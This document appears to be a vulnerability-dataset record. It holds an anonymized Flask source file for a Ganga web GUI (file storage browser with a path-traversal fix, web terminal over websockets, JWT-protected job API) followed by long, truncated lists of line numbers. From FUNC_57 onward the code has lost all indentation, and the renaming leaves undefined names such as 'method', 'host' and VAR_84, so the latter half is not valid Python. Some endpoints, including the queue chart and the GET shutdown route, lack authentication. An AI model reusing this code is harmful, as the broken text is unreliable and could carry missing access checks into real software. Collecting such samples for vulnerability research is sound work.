@VAR_0.route("/storage/<VAR_10:path>", methods=["GET", "POST"])
@login_required
def FUNC_22(VAR_10):
    """Browse and upload files under the server-side storage folder."""
    VAR_66 = VAR_0.config["STORAGE_FOLDER"]
    # SECURITY FIX: os.path.join allowed '../' traversal out of the
    # storage folder; safe_join confines VAR_10 to it (the job browser
    # FUNC_14 already uses safe_join).
    VAR_58 = safe_join(VAR_66, VAR_10)
    if VAR_58 is None:
        # Older werkzeug returns None for unsafe paths.
        flash("Directory does not exist.", "warning")
        return redirect(url_for("dashboard"))
    if request.method == "POST":
        if "storagefile" in request.files:
            VAR_125 = request.files["storagefile"]
            if VAR_125.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            if VAR_125:
                if not os.path.isdir(VAR_58):
                    flash("Error while uploading the file", "danger")
                    return redirect(request.url)
                VAR_20 = secure_filename(VAR_125.filename)
                VAR_130 = os.path.join(VAR_58, VAR_20)
                VAR_125.save(VAR_130)
                flash("Successfully uploaded the file.", "success")
                return redirect(request.url)
        flash("No file, retry!", "warning")
        return redirect(request.url)
    VAR_59 = os.path.dirname(VAR_58).replace(VAR_66, "")
    if not os.path.exists(VAR_58):
        flash("Directory does not exist.", "warning")
        return redirect(url_for("dashboard"))
    if os.path.isfile(VAR_58):
        return send_file(VAR_58)
    VAR_60 = []
    VAR_61 = os.listdir(VAR_58)
    for file in VAR_61:
        VAR_60.append({
            "file": file,
            "directory": os.path.isdir(os.path.join(VAR_58, file))
        })
    # BUG FIX: template keywords referenced undefined names; pass locals.
    return render_template("storage.html", title="Storage",
                           VAR_58=VAR_58,
                           VAR_60=VAR_60,
                           VAR_59=VAR_59)
@VAR_0.route("/cli")
@login_required
def FUNC_23():
    """Embedded web terminal page."""
    return render_template("cli.html")
@VAR_3.on("connect", namespace="/pty")
def FUNC_24():
    """Websocket connect: start pumping pty output for logged-in users."""
    if VAR_0.config["CHILD_PID"] and current_user.is_authenticated:
        VAR_3.start_background_task(target=FUNC_63)
@VAR_3.on("pty-input", namespace="/pty")
def FUNC_25(VAR_13):
    """Websocket: forward browser keystrokes to the Ganga pty."""
    master_fd = VAR_0.config["FD"]
    if master_fd and current_user.is_authenticated:
        os.write(master_fd, VAR_13["input"].encode())
@VAR_3.on("resize", namespace="/pty")
def FUNC_26(VAR_13):
    """Websocket: propagate a browser terminal resize to the pty."""
    master_fd = VAR_0.config["FD"]
    if master_fd and current_user.is_authenticated:
        FUNC_62(master_fd, VAR_13["rows"], VAR_13["cols"])
@VAR_0.route("/token", methods=["POST"])
def FUNC_27():
    """Issue a JWT for valid username/password credentials (API login)."""
    payload = request.json if request.json else {}
    supplied_user = payload.get("username")
    supplied_password = payload.get("password")
    failure = {"success": False, "message": "Could not verify VAR_37."}
    if not supplied_user or not supplied_password:
        return jsonify(failure), 401
    VAR_37 = CLASS_0.query.filter_by(VAR_37=supplied_user).first()
    if VAR_37 and VAR_37.verify_password(supplied_password):
        token = VAR_37.generate_auth_token().decode("UTF-8")
        return jsonify({"token": token})
    return jsonify(failure), 401
def FUNC_28(VAR_14):
    """Decorator: require a valid JWT in the X-Access-Token header.

    Injects the resolved CLASS_0 row as the wrapped view's first
    argument; responds 401 for missing/expired/invalid tokens.
    """
    @wraps(VAR_14)
    def FUNC_69(*VAR_25, **VAR_23):
        VAR_112 = None
        if "X-Access-Token" in request.headers:
            VAR_112 = request.headers["X-Access-Token"]
        if not VAR_112:
            return jsonify({"success": False, "message": "Token is missing"}), 401
        try:
            VAR_13 = jwt.decode(VAR_112, VAR_0.config["SECRET_KEY"], algorithms=["HS256"])
            # The token's public_id must map to an existing user (VAR_36).
            VAR_15 = CLASS_0.query.filter_by(VAR_36=VAR_13["public_id"]).first()
            if VAR_15 is None:
                return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
        except jwt.ExpiredSignatureError:
            return jsonify({"success": False, "message": "Token is expired"}), 401
        except jwt.InvalidTokenError:
            return jsonify({"success": False, "message": "Token is invalid"}), 401
        except:
            # NOTE(review): bare except — consider narrowing to Exception.
            return jsonify({"success": False, "message": "Could not verify token"}), 401
        return VAR_14(VAR_15, *VAR_25, **VAR_23)
    return FUNC_69
# --- Token-authenticated REST API: job resources (proxied to the
# --- internal Ganga server; errors become a 400 JSON response) ---------

# API: full info for job VAR_9.
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["GET"])
@FUNC_28
def FUNC_29(VAR_15, VAR_9: int):
    try:
        VAR_94 = FUNC_58(f"/internal/jobs/{VAR_9}", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_94)
# API: a single attribute VAR_16 of job VAR_9.
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_30(VAR_15, VAR_9: int, VAR_16: str):
    try:
        VAR_113 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_16}", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_113)
# API: full string representation of job VAR_9.
@VAR_0.route("/api/jobs/<int:VAR_9>/full-print", methods=["GET"])
@FUNC_28
def FUNC_31(VAR_15, VAR_9: int):
    try:
        VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/full-print", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_95)
# API: create a job from a template id and optional name.
@VAR_0.route("/api/jobs/create", methods=["POST"])
@FUNC_28
def FUNC_32(VAR_15):
    VAR_13 = {
        "template_id": request.json.get("template_id"),
        "job_name": request.json.get("job_name")
    }
    try:
        VAR_98 = FUNC_58("/internal/jobs/create", "post", json=VAR_13)
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
# API: copy job VAR_9.
@VAR_0.route("/api/jobs/<int:VAR_9>/copy", methods=["PUT"])
@FUNC_28
def FUNC_33(VAR_15, VAR_9: int):
    try:
        VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/copy", "put")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
# API: perform action VAR_17 on job VAR_9 with the request's JSON body.
@VAR_0.route("/api/jobs/<int:VAR_9>/<VAR_17>", methods=["PUT"])
@FUNC_28
def FUNC_34(VAR_15, VAR_9: int, VAR_17: str):
    VAR_71 = request.json
    try:
        VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/{VAR_17}", "put", json=VAR_71)
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
# API: delete job VAR_9.
@VAR_0.route("/api/jobs/<int:VAR_9>", methods=["DELETE"])
@FUNC_28
def FUNC_35(VAR_15, VAR_9: int):
    try:
        VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}", "delete")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
@VAR_0.route("/api/jobs/<int:VAR_9>/pin", methods=["PUT"])
@FUNC_28
def FUNC_36(VAR_15, VAR_9: int):
    """API: add VAR_9 to the current user's pinned-jobs list."""
    VAR_72 = current_user
    VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
    if VAR_9 not in VAR_40:
        # BUG FIX: appended via the undefined name `pinned_jobs`;
        # the decoded list is VAR_40.
        VAR_40.append(VAR_9)
    VAR_72.pinned_jobs = json.dumps(VAR_40)
    VAR_1.session.add(VAR_72)
    VAR_1.session.commit()
    return jsonify({"success": True, "message": f"Successfully pinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/unpin", methods=["PUT"])
@FUNC_28
def FUNC_37(VAR_15, VAR_9: int):
    """API: remove VAR_9 from the current user's pinned-jobs list."""
    VAR_72 = current_user
    VAR_40 = json.loads(VAR_72.pinned_jobs) if VAR_72.pinned_jobs is not None else []
    if VAR_9 in VAR_40:
        # BUG FIX: removed via the undefined name `pinned_jobs`;
        # the decoded list is VAR_40.
        VAR_40.remove(VAR_9)
    VAR_72.pinned_jobs = json.dumps(VAR_40)
    VAR_1.session.add(VAR_72)
    VAR_1.session.commit()
    return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={VAR_9})."})
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs", methods=["GET"])
@FUNC_28
def FUNC_38(VAR_15, VAR_9: int):
    """API: list subjobs of job VAR_9 filtered by query arguments."""
    VAR_73 = {
        "ids": request.args.get("ids"),
        "status": request.args.get("status"),
        "application": request.args.get("application"),
        "backend": request.args.get("backend"),
        "recent": request.args.get("recent"),
        "length": request.args.get("length"),
        "offset": request.args.get("offset")
    }
    try:
        # BUG FIX: the call passed the undefined name `params`;
        # the dict built above is VAR_73.
        VAR_102 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs", "get", VAR_73=VAR_73)
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_102)
# API: full info for subjob VAR_11 of job VAR_9.
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>", methods=["GET"])
@FUNC_28
def FUNC_39(VAR_15, VAR_9: int, VAR_11: int):
    try:
        VAR_104 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_104)
# API: a single attribute VAR_16 of the subjob.
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/<VAR_16>", methods=["GET"])
@FUNC_28
def FUNC_40(VAR_15, VAR_9: int, VAR_11: int, VAR_16: str):
    try:
        VAR_114 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/{VAR_16}", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_114)
# API: full string representation of the subjob.
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/full-print", methods=["GET"])
@FUNC_28
def FUNC_41(VAR_15, VAR_9: int, VAR_11: int):
    try:
        VAR_95 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/full-print", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_95)
# API: copy the subjob into a new job.
@VAR_0.route("/api/jobs/<int:VAR_9>/subjobs/<int:VAR_11>/copy", methods=["PUT"])
@FUNC_28
def FUNC_42(VAR_15, VAR_9: int, VAR_11: int):
    try:
        VAR_98 = FUNC_58(f"/internal/jobs/{VAR_9}/subjobs/{VAR_11}/copy", "put")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
@VAR_0.route("/api/jobs", methods=["GET"])
@FUNC_28
def FUNC_43(VAR_15):
    """API: list jobs filtered by the query-string arguments."""
    VAR_73 = {
        "ids": request.args.get("ids"),
        "status": request.args.get("status"),
        "application": request.args.get("application"),
        "backend": request.args.get("backend"),
        "recent": request.args.get("recent"),
        "length": request.args.get("length"),
        "offset": request.args.get("offset"),
        "auto-validate-ids": request.args.get("auto-validate-ids")
    }
    try:
        # BUG FIX: the call passed the undefined name `params`;
        # the dict built above is VAR_73.
        VAR_93 = FUNC_58("/internal/jobs", "get", VAR_73=VAR_73)
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_93)
# API: aggregate job statistics.
@VAR_0.route("/api/jobs/statistics", methods=["GET"])
@FUNC_28
def FUNC_44(VAR_15):
    try:
        VAR_115 = FUNC_58("/internal/jobs/statistics", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_115)
# API: queue status list.
@VAR_0.route("/api/queue", methods=["GET"])
@FUNC_28
def FUNC_45(VAR_15):
    try:
        VAR_109 = FUNC_58("/internal/queue", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_109)
# Chart data for the queue page.
# NOTE(review): unlike its siblings this endpoint has no FUNC_28 token
# check and no error handling — confirm whether that is intentional.
@VAR_0.route("/api/queue/chart", methods=["GET","POST"])
def FUNC_46():
    VAR_74 = FUNC_58("/internal/queue/data", "get")
    VAR_75 = make_response(json.dumps(VAR_74))
    VAR_75.content_type = 'application/json'
    return VAR_75
# API: ids of jobs in incomplete state.
@VAR_0.route("/api/jobs/incomplete_ids", methods=["GET"])
@FUNC_28
def FUNC_47(VAR_15):
    try:
        VAR_116 = FUNC_58("/internal/jobs/incomplete-ids", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_116)
# API: full config, or one section when VAR_18 is given.
@VAR_0.route("/api/config", methods=["GET"], defaults={"section": ""})
@VAR_0.route("/api/config/<VAR_18>", methods=["GET"])
@FUNC_28
def FUNC_48(VAR_15, VAR_18: str):
    try:
        if VAR_18 != "":
            VAR_48 = FUNC_58(f"/internal/config/{VAR_18}", "get")
        else:
            VAR_48 = FUNC_58("/internal/config", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_48)
@VAR_0.route("/api/templates", methods=["GET"])
@FUNC_28
def FUNC_49(VAR_15):
    """API: list templates filtered by the query-string arguments."""
    VAR_73 = {
        "application": request.args.get("application"),
        "backend": request.args.get("backend"),
        "recent": request.args.get("recent"),
        "length": request.args.get("length"),
        "offset": request.args.get("offset"),
    }
    try:
        # BUG FIX: the call passed the undefined name `params`;
        # the dict built above is VAR_73.
        VAR_88 = FUNC_58("/internal/templates", "get", VAR_73=VAR_73)
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_88)
# API: full string representation of template VAR_19.
@VAR_0.route("/api/templates/<int:VAR_19>/full-print", methods=["GET"])
@FUNC_28
def FUNC_50(VAR_15, VAR_19: int):
    try:
        VAR_95 = FUNC_58(f"/internal/templates/{VAR_19}/full-print", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_95)
# API: delete template VAR_19.
@VAR_0.route("/api/templates/<int:VAR_19>", methods=["DELETE"])
@FUNC_28
def FUNC_51(VAR_15, VAR_19: int):
    try:
        VAR_98 = FUNC_58(f"/internal/templates/{VAR_19}", "delete")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
# API: credential store contents.
@VAR_0.route("/api/credentials", methods=["GET"])
@FUNC_28
def FUNC_52(VAR_15):
    try:
        VAR_108 = FUNC_58("/internal/credentials", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_108)
# API: renew all credentials.
@VAR_0.route("/api/credentials/renew", methods=["PUT"])
@FUNC_28
def FUNC_53(VAR_15):
    try:
        VAR_98 = FUNC_58("/internal/credentials/renew", "put")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_98)
# API: the job tree structure.
@VAR_0.route("/api/jobtree", methods=["GET"])
@FUNC_28
def FUNC_54(VAR_15):
    try:
        VAR_117 = FUNC_58("/internal/jobtree", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_117)
# API: available plugin lists.
@VAR_0.route("/api/plugins", methods=["GET"])
@FUNC_28
def FUNC_55(VAR_15):
    try:
        VAR_110 = FUNC_58("/internal/plugins", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_110)
# API: detailed info for the plugin named VAR_12.
@VAR_0.route("/api/VAR_8/<VAR_12>", methods=["GET"])
@FUNC_28
def FUNC_56(VAR_15, VAR_12: str):
    try:
        VAR_111 = FUNC_58(f"/internal/VAR_8/{VAR_12}", "get")
    except Exception as err:
        return jsonify({"success": False, "message": str(err)}), 400
    return jsonify(VAR_111)
def FUNC_57(VAR_20):
return "." in VAR_20 and VAR_20.rsplit(".", 1)[1].lower() in VAR_6
def FUNC_58(VAR_21: str, VAR_22: str, **VAR_23):
VAR_76 = f"http://localhost:{VAR_0.config['INTERNAL_PORT']}"
if VAR_22 not in ["get", "post", "put", "delete"]:
raise Exception(f"Unsupported VAR_22: {method}")
VAR_77 = getattr(requests, VAR_22)(VAR_76 + VAR_21, **VAR_23)
if VAR_77.status_code != 200:
raise Exception(VAR_77.json().get("message"))
return VAR_77.json()
def FUNC_59():
if "templates_per_page" not in VAR_84:
session["templates_per_page"] = 10
if "templates_filter" not in VAR_84:
session["templates_filter"] = {key: "any" for key in ["application", "backend"]}
if "jobs_per_page" not in VAR_84:
session["jobs_per_page"] = 10
if "jobs_filter" not in VAR_84:
session["jobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
if "subjobs_per_page" not in VAR_84:
session["subjobs_per_page"] = 10
if "subjobs_filter" not in VAR_84:
session["subjobs_filter"] = {key: "any" for key in ["status", "application", "backend"]}
def FUNC_60():
VAR_78 = 0
while True:
try:
VAR_126 = FUNC_58("/ping", "get")
if VAR_126 is True:
return True
except:
time.sleep(2)
print("Internal API server not online (mostly because Ganga is booting up), retrying...")
VAR_78 += 1
if VAR_78 > 20:
return False
def FUNC_61(VAR_24: int, VAR_25: str = ""):
(VAR_79, VAR_26) = pty.fork()
if VAR_79 == 0:
VAR_118 = os.environ.copy()
VAR_118["WEB_CLI"] = "True"
VAR_118["INTERNAL_PORT"] = str(VAR_24)
subprocess.run(f"ganga --webgui {VAR_25}", shell=True, env=VAR_118)
else:
VAR_0.config["FD"] = VAR_26
VAR_0.config["CHILD_PID"] = VAR_79
FUNC_62(VAR_26, 50, 50)
print("Ganga started, PID: ", VAR_79)
def FUNC_62(VAR_26, VAR_27, VAR_28, VAR_29=0, VAR_30=0):
VAR_80 = struct.pack("HHHH", VAR_27, VAR_28, VAR_29, VAR_30)
fcntl.ioctl(VAR_26, termios.TIOCSWINSZ, VAR_80)
def FUNC_63():
VAR_81 = 1024 * 20
while True:
VAR_3.sleep(0.01)
if VAR_0.config["FD"]:
VAR_127 = 0
(VAR_128, VAR_129, _) = select.select([VAR_0.config["FD"]], [], [], VAR_127)
if VAR_128:
VAR_131 = os.read(VAR_0.config["FD"], VAR_81).decode()
VAR_3.emit("pty-output", {"output": VAR_131}, namespace="/pty")
def FUNC_64(VAR_31: str, VAR_32: int, VAR_24: int, VAR_33=True, VAR_34: str = ""):
from GangaGUI.start import create_default_user
VAR_82, VAR_83 = create_default_user()
print(f"Starting the GUI server on http://{VAR_31}:{VAR_32}")
print(f"You VAR_2 information for the GUI is: Username: {VAR_82.user} Password: {VAR_83}")
VAR_0.config["INTERNAL_PORT"] = VAR_24
VAR_0.config["WEB_CLI"] = True
VAR_0.config["GANGA_ARGS"] = VAR_34
VAR_3.run(VAR_0, VAR_31=host, VAR_32=port, VAR_33=log_output) # TODO
@VAR_0.route("/shutdown", methods=["GET"])
def FUNC_65():
if VAR_0.config["WEB_CLI"] is True:
flash("WEB CLI Mode is on, cannot self FUNC_65 server. Consider doing manually.", "warning")
return redirect(url_for("dashboard"))
try:
VAR_98 = FUNC_58("/shutdown", "get")
except Exception as err:
return jsonify({"success": False, "message": str(err)}), 400
return "GUI Shutdown Successful."
| [
23,
24,
25,
26,
27,
30,
31,
32,
34,
35,
40,
41,
43,
44,
45,
46,
47,
56,
59,
62,
67,
70,
71,
72,
76,
77,
78,
79,
80,
81,
92,
93,
95,
96,
99,
100,
101,
102,
103,
104,
110,
112,
113,
119,
120,
123,
124,
126,
127,
131,
132,
134,
140,
141,
142,
143,
144,
145,
151,
152,
155,
156,
158,
159,
162,
163,
165,
166,
171,
173,
174,
176,
178,
179,
180,
186,
187,
190,
192,
193,
194,
201,
205,
207,
209,
210,
212,
213,
218,
220,
222,
229,
230,
231,
238,
242,
243,
245,
248,
250,
252,
253,
255,
257,
259,
261,
262,
280,
282,
288,
289,
291,
292,
298,
299,
303,
304,
306,
308,
310,
313,
314,
317,
318,
324,
325,
329,
330,
332,
334,
336,
339,
340,
343,
344,
347,
349,
352,
354,
357,
359,
360,
361,
368,
369,
371,
372,
377,
378,
380,
383,
385,
388,
390,
391,
392,
399,
400,
402,
406,
407,
409,
410,
412,
414,
415,
417,
418,
420,
421,
424,
425,
432,
433,
435,
437,
440,
448,
449,
450,
457,
458,
460,
465,
466,
468,
469,
471,
473,
474,
476,
477,
479,
480,
483,
484,
491,
492,
494,
496,
499,
508,
509,
510,
518,
521,
523,
524,
526,
527,
529,
530,
533,
534,
538,
539,
543,
545,
548,
558,
559,
560,
568,
569,
571,
573,
574,
576,
577,
579,
581,
583,
585,
586,
587,
595,
596,
599,
600,
602,
603,
607,
608,
610,
613,
615,
618,
620,
622,
623,
626,
628,
631,
633,
634,
635,
645,
647,
649,
650,
652,
654,
657,
658,
660,
661,
663,
664,
668,
669,
672,
674,
675,
677,
678,
684,
690,
691,
692,
700,
701,
703,
708,
709,
711,
712,
714,
716,
719,
720,
722,
723,
726,
727,
734,
735,
737,
741,
751,
752,
753,
762,
765,
767,
768,
770,
771,
773,
774,
776,
777,
781,
782,
785,
786,
790,
791,
795,
797,
800,
812,
813,
814,
821,
823,
825,
827,
830,
832,
844,
846,
847,
854,
856,
858,
860,
863,
865,
866,
867,
875,
877,
879,
881,
884,
886,
887,
888,
896,
900,
902,
905,
906,
909,
910,
913,
917,
920,
921,
929,
930,
932,
933,
935,
936,
938,
939,
945,
946,
948,
952,
956,
957,
960,
961,
964,
965,
967,
968,
972,
973,
976,
978,
979,
981,
982,
988,
993,
994,
995,
1000,
1001,
1002,
1008,
1010,
1013,
1014,
1015,
1021,
1024,
1025,
1026,
1033,
1036,
1037,
1038,
1039,
1040,
1046,
1047,
1051,
1052,
1056,
1057,
1063,
1064,
1067,
1068,
1069,
1070,
1071,
1076,
1079,
1081,
1082,
1085,
1088,
1089,
1101,
1103,
1105,
1106,
1107,
1108,
1109,
1110,
1116,
1120,
1122,
1124,
1127,
1129,
1130,
1131,
1137,
1142,
1144,
1146,
1149,
1151,
1152,
1153,
1159,
1163,
1165,
1167,
1170,
1172,
1173,
1174,
1180,
1182,
1185,
1186,
1191,
1193,
1195,
1198,
1200,
1201,
1202,
1211,
1213,
1215,
1218,
1220,
1221,
1222,
1228,
1230,
1234,
1236,
1240,
1242,
1246,
1249,
1251,
1256,
1257,
1259,
1261,
1263,
1266,
1268,
1269,
1270,
1276,
1280,
1282,
1284,
1287,
1289,
1290,
1291,
1300,
1301,
1303,
1304,
1306,
1307,
1310,
1311,
1315,
1317,
1318,
1319,
1328,
1329,
1331,
1332,
1334,
1335,
1338,
1339,
1343,
1345,
1346,
1347,
1348,
1349,
1355,
1365,
1369,
1379,
1381,
1383,
1386,
1388,
1389,
1390,
1396,
1401,
1403,
1405,
1408,
1410,
1411,
1412,
1418,
1424,
1426,
1428,
1431,
1433,
1434,
1435,
1441,
1446,
1448,
1450,
1453,
1455,
1456,
1457,
1467,
1469,
1471,
1474,
1476,
1477,
1478,
1479,
1480,
1486,
1497,
1500,
1511,
1513,
1515,
1518,
1520,
1521,
1522,
1530,
1532,
1536,
1538,
1542,
1545,
1548,
1550,
1553,
1554,
1559,
1560,
1568,
1570,
1572,
1575,
1577,
1578,
1579,
1580,
1581,
1588,
1590,
1593,
1595,
1600,
1603,
1605,
1606,
1607,
1608,
1609,
1615,
1624,
1627,
1635,
1637,
1639,
1642,
1644,
1645,
1646,
1652,
1656,
1658,
1660,
1663,
1665,
1666,
1667,
1672,
1674,
1678,
1680,
1682,
1685,
1687,
1688,
1689,
1690,
1691,
1697,
1700,
1702,
1704,
1707,
1709,
1710,
1711,
1717,
1720,
1722,
1724,
1727,
1729,
1730,
1731,
1732,
1733,
1739,
1742,
1744,
1746,
1749,
1751,
1752,
1753,
1754,
1755,
1761,
1764,
1766,
1768,
1771,
1773,
1774,
1775,
1781,
1785,
1787,
1789,
1792,
1794,
1795,
1796,
1797,
1798,
1801,
1802,
1803,
1810,
1813,
1816,
1817,
1819,
1820,
1823,
1824,
1826,
1827,
1830,
1831,
1833,
1834,
1839,
1840,
1845,
1846,
1851,
1852,
1857,
1858,
1859,
1864,
1873,
1878,
1879,
1886,
1887,
1889,
1891,
1897,
1902,
1903,
1904,
1908,
1909,
1910,
1921,
1922,
1931,
1933,
1934,
1936,
1939,
1944,
1945,
1946,
1947,
1948,
1951,
1955,
1960,
1962,
1963,
1964,
107,
108,
109,
148,
149,
150,
183,
184,
185,
198,
199,
200,
235,
236,
237,
266,
267,
268,
285,
286,
287,
365,
366,
367,
396,
397,
398,
454,
455,
456,
514,
515,
516,
517,
564,
565,
566,
567,
591,
592,
593,
594,
640,
641,
642,
643,
644,
696,
697,
698,
699,
757,
758,
759,
760,
761,
818,
819,
820,
836,
837,
838,
851,
852,
853,
871,
872,
873,
874,
892,
893,
894,
895,
926,
927,
928,
1005,
1006,
1007,
1018,
1019,
1020,
1029,
1030,
1031,
1032,
1043,
1044,
1045,
1073,
1074,
1075,
1114,
1115,
1116,
1117,
1118,
1119,
1135,
1136,
1137,
1138,
1139,
1140,
1141,
1157,
1158,
1159,
1160,
1161,
1162,
1178,
1179,
1180,
1181,
1182,
1183,
1184,
1206,
1207,
1208,
1209,
1210,
1226,
1227,
1228,
1229,
1230,
1231,
1232,
1233,
1234,
1235,
1236,
1237,
1238,
1239,
1240,
1241,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1251,
1252,
1253,
1254,
1255,
1274,
1275,
1276,
1277,
1278,
1279,
1295,
1296,
1297,
1298,
1299,
1323,
1324,
1325,
1326,
1327,
1353,
1354,
1355,
1356,
1357,
1358,
1359,
1360,
1361,
1362,
1363,
1364,
1365,
1366,
1367,
1368,
1394,
1395,
1396,
1397,
1398,
1399,
1400,
1416,
1417,
1418,
1419,
1420,
1421,
1422,
1423,
1439,
1440,
1441,
1442,
1443,
1444,
1445,
1461,
1462,
1463,
1464,
1465,
1466,
1484,
1485,
1486,
1487,
1488,
1489,
1490,
1491,
1492,
1493,
1494,
1495,
1496,
1497,
1498,
1499,
1526,
1527,
1528,
1529,
1564,
1565,
1566,
1567,
1586,
1587,
1588,
1589,
1590,
1591,
1592,
1613,
1614,
1615,
1616,
1617,
1618,
1619,
1620,
1621,
1622,
1623,
1624,
1625,
1626,
1650,
1651,
1652,
1653,
1654,
1655,
1671,
1672,
1673,
1674,
1675,
1676,
1677,
1695,
1696,
1697,
1698,
1699,
1715,
1716,
1717,
1718,
1719,
1737,
1738,
1739,
1740,
1741,
1759,
1760,
1761,
1762,
1763,
1779,
1780,
1781,
1782,
1783,
1784,
1805,
1806,
1807,
1808,
1809,
1810,
1811,
1812,
1813,
1814,
1815,
1836,
1837,
1838,
1861,
1862,
1863,
1881,
1882,
1883,
1884,
1885,
1924,
1925,
1926,
1927,
1928,
1929,
1930
] | [
23,
24,
25,
26,
27,
30,
31,
32,
34,
35,
40,
41,
43,
44,
45,
46,
47,
56,
59,
62,
67,
70,
71,
72,
76,
77,
78,
79,
80,
81,
92,
93,
95,
96,
99,
100,
101,
102,
103,
104,
110,
112,
113,
119,
120,
123,
124,
126,
127,
131,
132,
134,
140,
141,
142,
143,
144,
145,
151,
152,
155,
156,
158,
159,
162,
163,
165,
166,
171,
173,
174,
176,
178,
179,
180,
186,
187,
190,
192,
193,
194,
201,
205,
207,
209,
210,
212,
213,
218,
220,
222,
229,
230,
231,
238,
242,
243,
245,
248,
250,
252,
253,
255,
257,
259,
261,
262,
280,
282,
288,
289,
291,
292,
298,
299,
303,
304,
306,
308,
310,
313,
314,
317,
318,
324,
325,
329,
330,
332,
334,
336,
339,
340,
343,
344,
347,
349,
352,
354,
357,
359,
360,
361,
368,
369,
371,
372,
377,
378,
380,
383,
385,
388,
390,
391,
392,
399,
400,
402,
406,
407,
409,
410,
412,
414,
415,
417,
418,
420,
421,
424,
425,
432,
433,
435,
437,
440,
448,
449,
450,
457,
458,
460,
465,
466,
468,
469,
471,
473,
474,
476,
477,
479,
480,
483,
484,
491,
492,
494,
496,
499,
508,
509,
510,
518,
521,
523,
524,
526,
527,
529,
530,
533,
534,
538,
539,
543,
545,
548,
558,
559,
560,
568,
569,
571,
573,
574,
576,
577,
579,
581,
583,
585,
586,
587,
595,
596,
599,
600,
602,
603,
607,
608,
610,
613,
615,
618,
620,
622,
623,
626,
628,
631,
633,
634,
635,
645,
647,
649,
650,
652,
654,
657,
658,
660,
661,
663,
664,
668,
669,
672,
674,
675,
677,
678,
684,
690,
691,
692,
700,
701,
703,
708,
709,
711,
712,
714,
716,
719,
720,
722,
723,
726,
727,
734,
735,
737,
741,
751,
752,
753,
762,
765,
767,
768,
770,
771,
773,
774,
776,
777,
781,
782,
785,
786,
790,
791,
795,
797,
800,
812,
813,
814,
821,
823,
825,
827,
830,
832,
844,
846,
847,
854,
856,
858,
860,
863,
865,
866,
867,
875,
877,
879,
881,
884,
886,
887,
888,
896,
900,
902,
905,
906,
909,
910,
913,
917,
920,
921,
929,
930,
932,
933,
935,
936,
938,
939,
945,
946,
948,
952,
956,
957,
960,
961,
964,
965,
967,
968,
972,
973,
976,
978,
979,
981,
982,
988,
993,
994,
995,
1000,
1001,
1002,
1008,
1010,
1013,
1014,
1015,
1021,
1024,
1025,
1026,
1033,
1036,
1037,
1038,
1039,
1040,
1046,
1047,
1051,
1052,
1056,
1057,
1063,
1064,
1067,
1068,
1069,
1070,
1071,
1076,
1079,
1081,
1082,
1085,
1088,
1089,
1101,
1103,
1105,
1106,
1107,
1108,
1109,
1110,
1116,
1120,
1122,
1124,
1127,
1129,
1130,
1131,
1137,
1142,
1144,
1146,
1149,
1151,
1152,
1153,
1159,
1163,
1165,
1167,
1170,
1172,
1173,
1174,
1180,
1182,
1185,
1186,
1191,
1193,
1195,
1198,
1200,
1201,
1202,
1211,
1213,
1215,
1218,
1220,
1221,
1222,
1228,
1230,
1234,
1236,
1240,
